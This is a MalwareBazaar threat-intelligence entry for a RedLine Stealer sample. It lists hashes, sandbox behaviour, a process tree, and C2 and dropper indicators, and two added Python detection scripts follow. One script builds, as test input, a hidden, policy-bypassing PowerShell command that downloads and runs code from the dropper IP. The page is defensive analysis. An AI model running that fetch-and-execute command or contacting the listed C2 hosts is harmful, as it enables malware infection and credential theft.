MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 21b8d4abd97f566a604e26b415a59cbfea70a45dac5f704140c331d7784a134e. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



RedLineStealer


Vendor detections: 10



SHA256 hash: 21b8d4abd97f566a604e26b415a59cbfea70a45dac5f704140c331d7784a134e
SHA3-384 hash: 63213e84d168f97dafe4b322431f48cf0c2d4624db3531ffcc3b39671efbad8181c782d3a260de43600db42aa66958c2
SHA1 hash: 14bfaa9fd0bb6d94ff3207eeeffa0237f12b49c3
MD5 hash: 1d3e0b736692cb1ccafe74c27e1a0c15
humanhash: london-dakota-october-artist
File name: 21B8D4ABD97F566A604E26B415A59CBFEA70A45DAC5F7.exe
Signature RedLineStealer
File size: 159'744 bytes
First seen: 2022-03-03 18:26:50 UTC
Last seen: Never
File type: Executable exe
MIME type: application/x-dosexec
imphash 4cea7ae85c87ddc7295d39ff9cda31d1 (85 x RedLineStealer, 70 x LummaStealer, 61 x Rhadamanthys)
ssdeep 1536:PxmqWRQtRpKM5/gR94hUrClTe1z/s5gQSHf0gsEltGbVx4LYM:ZBtaM5EWCrATe1zU50Hi4cM
Threatray 700 similar samples on MalwareBazaar
TLSH T156F3C78736C0C49CDE7917F652A60041B3B5BCFBDA28A29F2BCD62661FE21D1583171B
File icon (PE):PE icon
dhash icon b2909696969ef66a (5 x RemcosRAT, 3 x NanoCore, 2 x njrat)
Reporter abuse_ch
Tags:exe RedLineStealer


abuse_ch
RedLineStealer C2:
172.83.152.87:17677

Indicators Of Compromise (IOCs)


Below is a list of indicators of compromise (IOCs) associated with this malware sample.

IOC                    ThreatFox Reference
172.83.152.87:17677    https://threatfox.abuse.ch/ioc/392359/

Intelligence


File Origin
# of uploads: 1
# of downloads: 256
Origin country: n/a
Vendor Threat Intelligence
Result
Verdict: Malware
Maliciousness:

Behaviour
Creating a file in the %temp% subdirectories
Running batch commands
Creating a process with a hidden window
Creating synchronization primitives
Creating a process from a recently created file
Creating a window
Launching a process
Sending an HTTP GET request
Creating a file in the %AppData% directory
DNS request
Downloading the file
Result
Malware family: n/a
Score: 8/10
Tags: n/a
Behaviour
MalwareBazaar
SystemUptime
MeasuringTime
EvasionGetTickCount
EvasionQueryPerformanceCounter
Result
Verdict: MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Result
Threat name: AsyncRAT BitRAT RedLine
Detection: malicious
Classification: bank.troj.spyw.evad
Score: 100 / 100
Signature
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates files in alternative data streams (ADS)
Creates multiple autostart registry keys
Encrypted powershell cmdline option found
Found malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential evasive VBS script found (sleep loop)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Suspicious powershell command line found
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected AsyncRAT
Yara detected BitRAT
Yara detected Generic Downloader
Yara detected RedLine Stealer
Behaviour
Behavior Graph:
Behavior Graph ID: 582770
Sample: 21B8D4ABD97F566A604E26B415A...
Start date: 03/03/2022
Architecture: WINDOWS
Score: 100

Network contacted during the run: zerocool888.duckdns.org; store-images.s-microsoft.com; 2 other IPs or domains
Signatures for the whole run: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures

Process tree (dropped files, network contacts and signatures are listed under the process they were attributed to):

21B8D4ABD97F566A604E26B415A59CBFEA70A45DAC5F7.exe
  Dropped: C:\Users\user\AppData\Local\Temp\...\0.vbs, ASCII
  Signatures: Creates multiple autostart registry keys
  cmd.exe
    Signatures: Malicious encrypted Powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found; Encrypted powershell cmdline option found
    wscript.exe
      Signatures: Malicious encrypted Powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found
      cmd.exe
        Signatures: Malicious encrypted Powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found; Encrypted powershell cmdline option found
        powershell.exe
          Network: 2.56.57.147 (ports 49766, 49767, 49770), GBTCLOUDUS, Netherlands
          Dropped: C:\Users\...\Windowj98d7shfiuUIUihdsa7h.vbs, ASCII
          Signatures: Potential evasive VBS script found (sleep loop)
          wscript.exe
            Signatures: Wscript starts Powershell (via cmd or directly); Very long command line found
            cmd.exe
              Signatures: Wscript starts Powershell (via cmd or directly); Very long command line found; Encrypted powershell cmdline option found
              powershell.exe
                Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                InstallUtil.exe
                  Network: zerocool888.duckdns.org, 172.83.152.87 (ports 17677, 49771, 49775), SPARTANHOSTGB, United States
                  Dropped: C:\Users\user\AppData\Local\Temp\rline.vbs, ASCII
                  cmd.exe
                    Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Encrypted powershell cmdline option found; Bypasses PowerShell execution policy
                InstallUtil.exe
                  Network: 192.168.2.1 (unknown); agences.ddns.net
                  Dropped: C:\Users\user\AppData\Local:03-03-2022, HTML (an alternate data stream on the Local folder)
                  Signatures: Creates files in alternative data streams (ADS); Hides threads from debuggers
                reg.exe
                  Signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Creates multiple autostart registry keys
                2 other processes
              conhost.exe
            cmd.exe
          conhost.exe
        conhost.exe
      conhost.exe
    conhost.exe
rundll32.exe
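The Sigma hits in the signature list and the behavior graph above describe a single chain: the dropped VBS runs under wscript.exe, cmd.exe launches an encoded PowerShell command that fetches the next stage from 2.56.57.147, and that PowerShell injects into InstallUtil.exe while reg.exe writes Run keys. The Python below is an added example (not code from abuse.ch or from any of the sandbox vendors quoted on this page) that implements those detections over constructed Sysmon-style events mirroring the graph. The command lines, the encoded payload, the PIDs and the registry value are assumptions: the report only shows process names, dropped paths and the dropper URL.

```python
"""Behavioural detections for the wscript -> cmd -> powershell -> InstallUtil
chain in this sample's behavior graph (added example; events are constructed,
field names loosely follow Sysmon Event ID 1 and 13)."""
import base64

# The page gives the dropper URL but not the PowerShell payload, so this
# one-liner is constructed to give the encoded-command decoder realistic input.
PAYLOAD = ("IEX (New-Object Net.WebClient).DownloadString("
           "'http://2.56.57.147/2dll/07.01.22.installutil.txt')")
ENC = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

TEMP = r"C:\Users\user\AppData\Local\Temp"
TEMP_MARK = "\\appdata\\local\\temp\\"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SUSPICIOUS_DIRS = (TEMP_MARK, "\\appdata\\roaming\\", "\\programdata\\", "\\users\\public\\")

EVENTS = [  # constructed to mirror the behavior graph; pids are arbitrary
    {"id": 1, "pid": 10, "ppid": 1, "image": "21B8D4ABD97F566A604E26B415A59CBFEA70A45DAC5F7.exe", "cmd": ""},
    {"id": 1, "pid": 11, "ppid": 10, "image": "cmd.exe", "cmd": f'cmd /c "{TEMP}\\0.vbs"'},
    {"id": 1, "pid": 12, "ppid": 11, "image": "wscript.exe", "cmd": f'wscript.exe "{TEMP}\\0.vbs"'},
    {"id": 1, "pid": 13, "ppid": 12, "image": "cmd.exe", "cmd": f"cmd /c powershell -w hidden -ep bypass -enc {ENC}"},
    {"id": 1, "pid": 14, "ppid": 13, "image": "powershell.exe", "cmd": f"powershell -w hidden -ep bypass -enc {ENC}"},
    {"id": 1, "pid": 15, "ppid": 14, "image": "InstallUtil.exe", "cmd": "InstallUtil.exe"},
    {"id": 13, "pid": 16, "ppid": 14, "image": "reg.exe",  # Run key value (assumed path)
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windowj98d7shfiuUIUihdsa7h",
     "data": r"C:\Users\user\AppData\Roaming\Windowj98d7shfiuUIUihdsa7h.vbs"},
]


def _switch(token, full, minimum):
    """powershell.exe accepts any unambiguous prefix of a parameter name, so
    -e, -en, -enc ... all select -EncodedCommand; match the same way."""
    tok = token.lstrip("-/").lower()
    return len(tok) >= len(minimum) and full.startswith(tok)


def parse_powershell(cmd):
    """Return (decoded EncodedCommand or None, execution policy or None, hidden window?)."""
    toks = cmd.split()
    decoded = policy = None
    hidden = False
    i = 0
    while i < len(toks):
        tok = toks[i]
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if len(tok) < 2 or tok[0] not in "-/":
            i += 1
            continue
        name = tok.lstrip("-/").lower()
        if _switch(tok, "encodedcommand", "e") or name == "ec":
            try:  # -EncodedCommand carries base64 of a UTF-16LE string
                decoded = base64.b64decode(nxt, validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                decoded = None
        elif _switch(tok, "executionpolicy", "ex") or name == "ep":
            policy = nxt.lower()
        elif _switch(tok, "windowstyle", "w"):
            hidden = nxt.lower() == "hidden"
        else:
            i += 1
            continue
        i += 2  # the switch consumed its argument
    return decoded, policy, hidden


def ancestors(events, pid):
    """Yield parent image names of `pid`, nearest first (cycle-safe)."""
    by_pid = {e["pid"]: e for e in events if e["id"] == 1}
    seen = {pid}
    cur = by_pid.get(pid)
    while cur and cur["ppid"] in by_pid and cur["ppid"] not in seen:
        cur = by_pid[cur["ppid"]]
        seen.add(cur["pid"])
        yield cur["image"].lower()


def detect(events):
    """Return (rule, pid, detail) findings; rule names follow the Sigma hits above."""
    findings = []
    for e in events:
        img = e["image"].lower()
        if e["id"] == 1:
            cmd = e["cmd"]
            if img in SCRIPT_HOSTS and TEMP_MARK in cmd.lower():
                findings.append(("script_execution_from_temp", e["pid"], cmd))
            if img == "powershell.exe":
                decoded, policy, hidden = parse_powershell(cmd)
                if decoded is not None:
                    findings.append(("encoded_powershell_cmdline", e["pid"], decoded))
                if policy in ("bypass", "unrestricted"):
                    findings.append(("execution_policy_bypass", e["pid"], policy))
                if hidden:
                    findings.append(("hidden_window", e["pid"], cmd))
                chain = list(ancestors(events, e["pid"]))[:3]  # tolerate cmd.exe hops in between
                if SCRIPT_HOSTS & set(chain):
                    findings.append(("wscript_starts_powershell", e["pid"], " <- ".join(chain)))
            if img == "installutil.exe" and next(ancestors(events, e["pid"]), "") == "powershell.exe":
                findings.append(("powershell_spawns_installutil", e["pid"], cmd))
        elif e["id"] == 13 and "\\currentversion\\run" in e["key"].lower():
            if any(d in e["data"].lower() for d in SUSPICIOUS_DIRS):
                findings.append(("run_key_pointing_to_suspicious_folder", e["pid"], e["data"]))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule:40} pid={pid} {detail[:80]}")
```

The switch matcher is the part worth copying: powershell.exe resolves abbreviated parameters, so a rule that only looks for the literal string `-EncodedCommand` misses `-enc`, `-e` and `-ec`, and decoding the base64 as UTF-16LE (not UTF-8) is what turns the blob back into the URL the sandbox recorded as the dropper.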
Threat name: Win64.Backdoor.DcRat
Status: Malicious
First seen: 2022-02-25 11:13:27 UTC
File Type: PE+ (Exe)
Extracted files: 13
AV detection: 16 of 27 (59.26%)
Threat level: 5/5
Result
Malware family: redline
Score: 10/10
Tags: family:asyncrat family:bitrat family:redline botnet:ale botnet:default infostealer persistence rat spyware trojan upx
Behaviour
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Checks computer location settings
Blocklisted process makes network request
UPX packed file
Async RAT payload
AsyncRat
BitRAT
RedLine
RedLine Payload
Malware Config
C2 Extraction:
zerocool888.duckdns.org:8848
agences.ddns.net:5001
zerocool888.duckdns.org:17677
Dropper Extraction:
http://2.56.57.147/2dll/07.01.22.installutil.txt
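The C2 extraction above, the ThreatFox IOC in the IOC table and the dropper URL give three kinds of network indicator (hostname:port, ip:port, URL), and the sandbox separately flagged dynamic-DNS use and non-standard ports. The Python below is an added example (not code from abuse.ch or ThreatFox) that matches those indicators against DNS, connection and HTTP log lines; the log lines, their key=value format and the 10.0.0.0/8 source network are constructed for the demonstration. It goes slightly beyond the list by remembering which C2 hostname resolved to which address, so a later connection to that address on 8848 is attributed to zerocool888.duckdns.org even though only 172.83.152.87:17677 appears as a bare ip:port IOC.

```python
"""Match this entry's network IOCs against DNS / conn / HTTP logs (added
example; indicators come from the page, log lines are constructed)."""
import ipaddress
from urllib.parse import urlsplit

# Indicators copied from this MalwareBazaar entry.
C2_HOST_PORTS = {("zerocool888.duckdns.org", "8848"),
                 ("agences.ddns.net", "5001"),
                 ("zerocool888.duckdns.org", "17677")}
C2_IP_PORTS = {("172.83.152.87", "17677")}           # ThreatFox IOC 392359
DROPPER_URLS = {"http://2.56.57.147/2dll/07.01.22.installutil.txt"}
C2_DOMAINS = {h for h, _ in C2_HOST_PORTS}
C2_IPS = {ip for ip, _ in C2_IP_PORTS} | {urlsplit(u).hostname for u in DROPPER_URLS}
# Both C2 names live under free dynamic-DNS zones; any other name under them is
# only weak evidence on its own, so it is scored low rather than ignored.
DYNDNS_ZONES = ("duckdns.org", "ddns.net")

# Constructed log lines (not the sandbox's traffic). Lines 0-3 and 5 should hit;
# line 4 is an unrelated HTTPS connection and must not.
LOGS = [
    "ts=2022-03-03T18:30:01Z type=dns src=10.0.0.5 query=zerocool888.duckdns.org answer=172.83.152.87",
    "ts=2022-03-03T18:30:02Z type=conn src=10.0.0.5 dst=172.83.152.87 dport=17677 proto=tcp",
    "ts=2022-03-03T18:30:03Z type=http src=10.0.0.5 host=2.56.57.147 uri=/2dll/07.01.22.installutil.txt",
    "ts=2022-03-03T18:30:04Z type=dns src=10.0.0.7 query=other-host.duckdns.org answer=203.0.113.9",
    "ts=2022-03-03T18:30:05Z type=conn src=10.0.0.9 dst=198.51.100.3 dport=443 proto=tcp",
    "ts=2022-03-03T18:30:06Z type=conn src=10.0.0.5 dst=172.83.152.87 dport=8848 proto=tcp",
]


def parse(line):
    """Split 'k=v k=v ...' into a dict; values stay strings, later '=' are kept."""
    return dict(kv.split("=", 1) for kv in line.split() if "=" in kv)


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def scan(lines):
    """Return (line_index, severity, rule, indicator) for every IOC hit.

    DNS answers for C2 domains are remembered so a later connection to the
    resolved address on a C2 port is attributed to the hostname:port IOC.
    """
    resolved = {}  # ip -> C2 domain it was returned for earlier in the log
    hits = []
    for i, line in enumerate(lines):
        f = parse(line)
        kind = f.get("type")
        if kind == "dns":
            q, ans = f.get("query", "").lower(), f.get("answer", "")
            if q in C2_DOMAINS:
                hits.append((i, "high", "c2_domain", q))
                if ans:
                    resolved[ans] = q
            elif any(q == z or q.endswith("." + z) for z in DYNDNS_ZONES):
                hits.append((i, "low", "dynamic_dns_query", q))
            if ans in C2_IPS:
                hits.append((i, "high", "c2_ip_resolution", ans))
        elif kind == "conn":
            dst, dport = f.get("dst", ""), f.get("dport", "")
            if (dst, dport) in C2_IP_PORTS:
                hits.append((i, "high", "c2_ip_port", f"{dst}:{dport}"))
            elif dst in resolved and (resolved[dst], dport) in C2_HOST_PORTS:
                hits.append((i, "high", "c2_host_port_via_resolution", f"{resolved[dst]}:{dport}"))
            elif dst in C2_IPS:
                hits.append((i, "medium", "c2_ip_other_port", f"{dst}:{dport}"))
        elif kind == "http":
            host, uri = f.get("host", ""), f.get("uri", "")
            url = f"http://{host}{uri}"
            if url in DROPPER_URLS:
                hits.append((i, "high", "dropper_url", url))
            elif _is_ip_literal(host):  # plain HTTP to a bare IP, as the dropper used
                hits.append((i, "low", "http_to_ip_literal", host))
    return hits


if __name__ == "__main__":
    for hit in scan(LOGS):
        print(hit)
```

Keep the dynamic-DNS and IP-literal rules at low severity when you adapt this: on their own they fire on plenty of legitimate traffic, and their value here is as corroboration next to a high-confidence hostname, ip:port or URL match.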
Unpacked files
SHA256 hash: 21b8d4abd97f566a604e26b415a59cbfea70a45dac5f704140c331d7784a134e
MD5 hash: 1d3e0b736692cb1ccafe74c27e1a0c15
SHA1 hash: 14bfaa9fd0bb6d94ff3207eeeffa0237f12b49c3
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments